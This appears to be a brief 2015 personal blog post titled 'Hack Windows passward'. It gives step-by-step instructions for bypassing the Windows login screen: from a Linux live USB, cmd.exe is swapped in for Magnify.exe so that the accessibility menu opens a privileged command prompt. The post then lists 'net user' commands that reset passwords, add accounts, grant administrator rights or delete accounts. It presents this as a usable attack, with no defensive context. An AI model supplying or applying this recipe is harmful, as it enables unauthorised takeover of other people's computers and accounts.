Saturday, October 17, 2015

Hack Windows passward

  1. Bootablelinux USB && boot some flavor of linux live USB
  2. Navigate to system32
  3. Rename Magnify.exe : find magnify.exe, and rename it to magnify.old
  4. Rename cmd.exe : find cmd.exe, and rename it to magnify.exe
  5. shutdown ubuntu and reboot Windows
  6. Get CMD Prompt Modify Accounts : Ease of Access : click "magnifier" and hit "apply"
  7. get an cmd seesion, type "net user" to get a list of accounts.                           My Options:                                                                                                        Change PWD : "net user username new_password"                                          Add an account : net user username password /add                                         Admin that : net localgroup administrators username /add                             Deltet that : net user username /delete                                                              net user systax reference                                                                          
  8. Reboot linux and Fix magnify.exe : repeat step 1 && 2 && 3, then rename magnify.exe to cmd.exe , rename magnify.old to magnify.exe


reference : clever method

No comments:

Post a Comment